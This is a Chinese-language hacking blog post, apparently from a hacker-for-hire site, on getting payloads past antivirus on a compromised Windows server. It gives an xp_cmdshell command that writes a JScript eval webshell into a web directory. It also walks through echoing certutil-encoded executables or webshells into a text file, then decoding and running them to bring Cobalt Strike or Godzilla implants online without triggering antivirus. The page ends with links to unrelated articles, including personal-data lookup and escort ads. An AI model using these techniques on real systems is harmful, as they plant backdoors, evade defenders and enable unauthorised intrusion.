当前位置:首页 > 网络安全 > 正文内容

文件上传的一个骚操作(低权限+bypassAV)

访客4年前 (2021-04-18)网络安全576

各位在渗透中是否遇见过这个问题:

虽然有低权限命令shell,如mssql、postgres等,执行下载总是各种无权限或者被AV杀,轻则无法继续渗透,重则弹出拦截消息,管理员上机后立马发现。

本文将介绍一种使用windows自带工具进行编码,写入编码数据到TXT文本最后再解码的骚操作。

话不多说,例如这样场景:在数据库连接后或者sqlmap注入连接os-shell后可执行命令:

其中包括杀软或某狗、某盾:

此时下载文件的各种命令均被拦截:

bitsadmin:

certutil证书:

还会被杀软报警:

powershell也会被彻底封杀:

尤其是某管家,拦截更彻底,根本没有倒计时自动消失(此时需要夸一下某大厂的报警提示倒计时功能)

而在这种环境下可在有权限写入的前提下尝试写入一句话木马:

xp_cmdshell 'echo? ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["bmfx"], "unsafe");%^>> D:\\WWW\\bmfx.aspx'

但也存在被某狗、WAF杀掉的可能。

此时,骚操作上场。

windows自带的证书下载,也就是上文使用但远程下载被拦截的Certutil,还可用来对文件编码解码:

本地: Certutil -encode artifact.txt artifact.exe 或指定路径: Certutil -encode d:\artifact.txt d:\artifact.exe

将txt文本使用echo命令:

echo sfAFASFAsfasgasdf………>>d:\1.txt

写入服务器后,进入txt所在目录执行解码(或直接指定物理目录文件):

Certutil -decode art.txt art.exe 或: Certutil -decode d:\art.txt d:\art.exe

后续可在命令中执行exe上线:

cmd.exe /c art.exe

重点是:本地解码编码操作不会触发杀软拦截行为!

此外,Certutil支持将任意文件编码解码,除了exe还有aspx、php、jsp等(如加密免杀的webshell,此处使用哥斯拉为例):

可在web站点写入文件后访问txt查看写入有无偏差:

还有一点,本人亲测,编码后txt中的文本类似于生成的shellcode,会自动换行显示,但本地替换换行符、自行拆分换行符,不改变内容的前提下,编码、解码前后的文件不会有任何影响。

但是在navicat等数据库软件里操作的话还有一个限制,echo的长度会提示不要过长:

此时就要看各位师傅们在bypass WaF、AV时如何减小体量了,一般cs的马bypass后会在50k左右,使用sqlmap的—os-shell执行echo不会像navicat要求128字符那么短,但也有长度限制,具体各位可亲测。

扫描二维码推送至手机访问。

版权声明:本文由黑客接单发布,如需转载请注明出处。

本文链接:http://therlest.com/105268.html

分享给朋友:

“文件上传的一个骚操作(低权限+bypassAV)” 的相关文章

洗米华小三(浅谈米花三笑的微博)

据长江网2021年11月26日23:49:22的最新消息,微博网友@ 爆料。 平安夜来临之际,事件,在网上炒得沸沸扬扬,引发全网热议! 据悉,洗米华小三。猜测这是洗米华在暗中帮助着Mandy。挺想看他老婆小三都抛弃他的场面。 1.洗米华小三 m...

【紧急+重要】勒索病毒解决方案!附:MS17-010补丁下载

  滚动更新:2017年5月13日16:57:22   游侠安全网(良心网站,站长先贴上注意事项和解决方法!防止你看本文的时候就被加密了!   1、本次共计是自动化攻击,利用了Windows的MS17-010。但苹果的MacOS用户不用得意,因为在昨晚之前,我这里得到的好几起勒索攻击案例都是针对...

记一次阿里云主机accesskey泄露到图形化工具开发

简介 在日常渗透过程中我们经常遇到信息泄露出ALIYUN_ACCESSKEYID与ALIYUN_ACCESSKEYSECRET(阿里云API key),特别是laravel框架得debug信息。APP中也会泄露这些信息。 !!!下载链接在文末!!! 概述 我们说下阿里API有什么用吧,以下是...

上海南京东路站街伴游2019-【杨雅瑄】

“上海南京东路站街伴游2019-【杨雅瑄】” 上海伴游陪游旅行网顾建军,上海伴游网顾建军的详细资料一:找真实的经纪人龙家住广州天河区的王先生最近咨询小编问 广州如何学生伴游 ,怎么能获得他们联系方式大家可以先通过百,104,广州学生伴游联系方式,广州商务伴游预约,家住广州天河区的王先生最近咨询小编问...

凭手机号姓名查身份证软件(点名检查身份证软件贴吧)

元宵节来临之际,查你的名字和身份证号码,你就可以用手机做任何事情你学会了吗!8YfxF9经同事小王同意,2月4日12时06分,记者将小王的手机号码提供给冠名网站“孤星泪”卖家索要小王的身份信息,对方要价220元。 1.姓名查询身份证号码,用手机就能搞定一切,你学会了吗! 用手机查身...

SSH-MITM:支持公钥认证&amp;会话劫持和文件篡改的安全审计MITM服务器

SSH-MITM-拦截SSH流量 SSH-MITM服务器专为安全审计而设计,支持公钥认证、会话劫持和文件篡改等功能。需要注意的是,该工具基于Python语言开发,因此需要在主机设备上安装并配置好Python环境。 SSH-MITM安装 在使用任何软件包之前,我们都需要进行正确的安装。如需安装S...

评论列表

笙沉心児
3年前 (2022-05-29)

任意文件编码解码,除了exe还有aspx、php、jsp等(如加密免杀的webshell,此处使用哥斯拉为例):可在web站点写入文件后访问txt查看写入有无偏差:还有一点,本人亲测,编码后txt中的文本类似于生成的shellcode,会自动换行显示

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。